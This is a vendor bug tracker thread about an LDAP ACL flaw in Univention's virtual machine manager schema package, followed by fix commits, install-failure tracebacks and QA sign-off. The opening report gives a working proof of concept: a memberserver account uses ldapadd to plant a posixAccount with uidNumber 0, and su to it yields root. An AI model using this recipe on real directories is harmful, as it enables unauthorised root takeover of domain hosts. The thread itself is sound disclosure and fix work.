Univention Bugzilla – Bug 41723
univention-virtual-machine-manager-schema - take over complete domain as memberserver
Last modified: 2021-06-23 07:29:09 CEST
The ACL rules in the package univention-virtual-machine-manager-schema have to be adjusted. +++ This bug was initially created as a clone of Bug #41715 +++ Preconditions: Having a memberserver/slave/master/backup or any object underneath of cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base. root@xen3:~# eval "$(ucr shell)" root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base" Object created: cn=memberserver,cn=computers,dc=school,dc=local root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local # now PWN it $ cat posix_account.ldif dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local univentionAppID: foobar objectClass: univentionApp objectClass: posixAccount uid: hacker cn: hacker uidNumber: 0 gidNumber: 0 homeDirectory: /root loginShell: /bin/bash userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8= $ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local" $ su hacker Passwort: hacker@xen3:~# id uid=0(hacker) gid=0(root) Gruppen=0(root)
univention-virtual-machine-manager-schema.yaml: r70818 | YAML Bug #41723 univention-virtual-machine-manager-schema (6.0.1-2): r70815 | Bug #41723: uniupdatecopyright r70814 | Bug #41723: restrict access to UVMM object classes for memberservers and domaincontrollers
Crashes my update and leaves system without a working LDAP server: univention-virtual-machine-manager-schema (6.0.1-2.75.201607041950) wird eingerichtet ... Neue Version der Konfigurationsdatei /etc/univention/templates/files/etc/ldap/slapd.conf.d/66univention-ldap-server_acl-master-uvmm wird installiert ... Multifile: /etc/ldap/slapd.conf Restarting ldap server(s). Stopping ldap server(s): slapd ...done. Starting ldap server(s): slapd ...DITContentRuleDescription = "(" whsp numericoid whsp ; StructuralObjectClass identifier [ "NAME" qdescrs ] [ "DESC" qdstring ] [ "OBSOLETE" whsp ] [ "AUX" oids ] ; Auxiliary ObjectClasses [ "MUST" oids ] ; AttributeTypes [ "MAY" oids ] ; AttributeTypes [ "NOT" oids ] ; AttributeTypes whsp ")" failed. 577a88dc /usr/share/univention-ldap/schema/univention-virtual-machine-manager.schema: line 270 ditcontentrule: Unexpected token before ) DITContentRuleDescription = "(" whsp numericoid whsp ; StructuralObjectClass identifier [ "NAME" qdescrs ] [ "DESC" qdstring ] [ "OBSOLETE" whsp ] [ "AUX" oids ] ; Auxiliary ObjectClasses [ "MUST" oids ] ; AttributeTypes [ "MAY" oids ] ; AttributeTypes [ "NOT" oids ] ; AttributeTypes whsp ")" slapschema: bad configuration file!. 2016-07-04 18:03:40.443670527+02:00 (in joinscript_init) ucs-school-ldap-acls-master (14.0.1-7.76.201607041949) wird eingerichtet ... 2016-07-04 18:03:40.841997337+02:00 (in joinscript_init) Traceback (most recent call last): File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit output = univention.admincli.admin.doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit out=_doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit co=univention.admin.config.config(configRegistry['ldap/master']) File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__ base=univention.admin.uldap.getBaseDN(host) File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts']) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect raise e SERVER_DOWN: {'desc': "Can't contact LDAP server"} Traceback (most recent call last): File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit output = univention.admincli.admin.doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit out=_doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit co=univention.admin.config.config(configRegistry['ldap/master']) File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__ base=univention.admin.uldap.getBaseDN(host) File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts']) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect raise e SERVER_DOWN: {'desc': "Can't contact LDAP server"} Traceback (most recent call last): File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit output = univention.admincli.admin.doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit out=_doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit co=univention.admin.config.config(configRegistry['ldap/master']) File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__ base=univention.admin.uldap.getBaseDN(host) File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts']) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect raise e SERVER_DOWN: {'desc': "Can't contact LDAP server"} Traceback (most recent call last): File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit output = univention.admincli.admin.doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit out=_doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit co=univention.admin.config.config(configRegistry['ldap/master']) File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__ base=univention.admin.uldap.getBaseDN(host) File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts']) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect raise e SERVER_DOWN: {'desc': "Can't contact LDAP server"} Traceback (most recent call last): File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit output = univention.admincli.admin.doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit out=_doit(arglist) File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit co=univention.admin.config.config(configRegistry['ldap/master']) File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__ base=univention.admin.uldap.getBaseDN(host) File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts']) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay) File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect raise e SERVER_DOWN: {'desc': "Can't contact LDAP server"}
univention-virtual-machine-manager-schema (6.0.1-3): r70824 | Bug #41723: fix syntax error in LDAP schema
YAML: OK Code review: OK r70814: OK r70815: OK r70824: OK Tests: OK KVM: OK EC2: OK OpenStack: OK
I just saw a DC backup which couldn't join because the schema wasn't installed. 57849f5f /etc/ldap/slapd.conf: line 166: unknown attr "@univentionVirtualMachine" in to clause 57849f5f <access clause> ::= access to <what> [ by <who> [ <access> ] [ <control> ] ]+ <what> ::= bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | dn[.<dnstyle>=<DN>] [filter=<filter>] [attrs=<attrspec>] <attrspec> ::= <attrname> [val[/<matchingRule>][.<attrstyle>]=<value>] | <attrlist> <attrlist> ::= <attr> [ , <attrlist> ] <attr> ::= <attrname> | @<objectClass> | !<objectClass> | entry | children <who> ::= [ bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | anonymous | users | self | dn[.<dnstyle>]=<DN> ] [ realanonymous | realusers | realself | realdn[.<dnstyle>]=<DN> ] [dnattr=<attrname>] [realdnattr=<attrname>] [group[/<objectclass>[/<attrname>]][.<style>]=<group>] [peername[.<peernamestyle>]=<peer>] [sockname[.<style>]=<name>] [domain[.<domainstyle>]=<domain>] [sockurl[.<style>]=<url>] [dynacl/<name>[/<options>][.<dynstyle>][=<pattern>]] [ssf=<n>] [transport_ssf=<n>] [tls_ssf=<n>] [sasl_ssf=<n>] <style> ::= exact | regex | base(Object) <dnstyle> ::= base(Object) | one(level) | sub(tree) | children | exact | regex <attrstyle> ::= exact | regex | base(Object) | one(level) | sub(tree) | children <peernamestyle> ::= exact | regex | ip | ipv6 | path <domainstyle> ::= exact | regex | base(Object) | sub(tree) <access> ::= [[real]self]{<level>|<priv>} <level> ::= none|disclose|auth|compare|search|read|{write|add|delete}|manage <priv> ::= {=|+|-}{0|d|x|c|s|r|{w|a|z}|m}+ <control> ::= [ stop | continue | break ] dynacl: <name>=ACI <pattern>=<attrname> slapschema: bad configuration file!.
(In reply to Florian Best from comment #5) > I just saw a DC backup which couldn't join because the schema wasn't > installed. The join seems to have succeeded.
(In reply to Florian Best from comment #5) > I just saw a DC backup which couldn't join because the schema wasn't > installed. > > 57849f5f /etc/ldap/slapd.conf: line 166: unknown attr > "@univentionVirtualMachine" in to clause 57849f5f <access clause> ::= access > to <what> [ by <who> [ <access> ] [ <control> ] ]+ <what> ::= bin boot dev > etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found > media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz > vmlinuz.install vmlinuz.old | dn[.<dnstyle>=<DN>] [filter=<filter>] > [attrs=<attrspec>] <attrspec> ::= <attrname> > [val[/<matchingRule>][.<attrstyle>]=<value>] | <attrlist> <attrlist> ::= > <attr> [ , <attrlist> ] <attr> ::= <attrname> | @<objectClass> | > !<objectClass> | entry | children <who> ::= [ bin boot dev etc home > initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt > opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install > vmlinuz.old | anonymous | users | self | dn[.<dnstyle>]=<DN> ] [ > realanonymous | realusers | realself | realdn[.<dnstyle>]=<DN> ] > [dnattr=<attrname>] [realdnattr=<attrname>] > [group[/<objectclass>[/<attrname>]][.<style>]=<group>] > [peername[.<peernamestyle>]=<peer>] [sockname[.<style>]=<name>] > [domain[.<domainstyle>]=<domain>] [sockurl[.<style>]=<url>] > [dynacl/<name>[/<options>][.<dynstyle>][=<pattern>]] [ssf=<n>] > [transport_ssf=<n>] [tls_ssf=<n>] [sasl_ssf=<n>] <style> ::= exact | regex | > base(Object) <dnstyle> ::= base(Object) | one(level) | sub(tree) | children > | exact | regex <attrstyle> ::= exact | regex | base(Object) | one(level) | > sub(tree) | children <peernamestyle> ::= exact | regex | ip | ipv6 | path > <domainstyle> ::= exact | regex | base(Object) | sub(tree) <access> ::= > [[real]self]{<level>|<priv>} <level> ::= > none|disclose|auth|compare|search|read|{write|add|delete}|manage <priv> ::= > {=|+|-}{0|d|x|c|s|r|{w|a|z}|m}+ <control> ::= [ stop | continue | break ] > dynacl: <name>=ACI <pattern>=<attrname> slapschema: bad configuration file!. I've split it into Bug #41782. (In reply to Florian Best from comment #6) > (In reply to Florian Best from comment #5) > > I just saw a DC backup which couldn't join because the schema wasn't > > installed. > The join seems to have succeeded. Verified.
<http://errata.software-univention.de/ucs/4.1/214.html>